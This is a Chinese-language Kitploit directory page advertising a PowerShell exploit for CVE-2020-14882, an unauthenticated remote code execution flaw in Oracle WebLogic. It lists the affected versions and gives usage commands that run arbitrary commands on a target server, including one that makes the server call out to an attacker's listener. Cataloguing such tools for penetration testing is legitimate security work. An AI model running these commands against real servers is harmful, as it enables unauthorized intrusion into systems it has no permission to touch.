Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-14882 — 用 PowerShell 重写的 CVE-2020-14882 | Kitploit
工具/GitHubGitHub/root-shells/cve-2020-14882
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubroot-shells/cve-2020-14882

CVE-2020-14882

用 PowerShell 重写的 CVE-2020-14882

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Oracle WebLogic 未授权远程代码执行漏洞利用工具

此PowerShell脚本利用CVE-2020-14882实现对Oracle WebLogic Server的未授权远程代码执行,受影响版本:

  • 10.3.6.0.0
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 14.1.1.0.0

用法

root@kitploit:~
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'

参考

ExploitDB上的漏洞利用

下载工具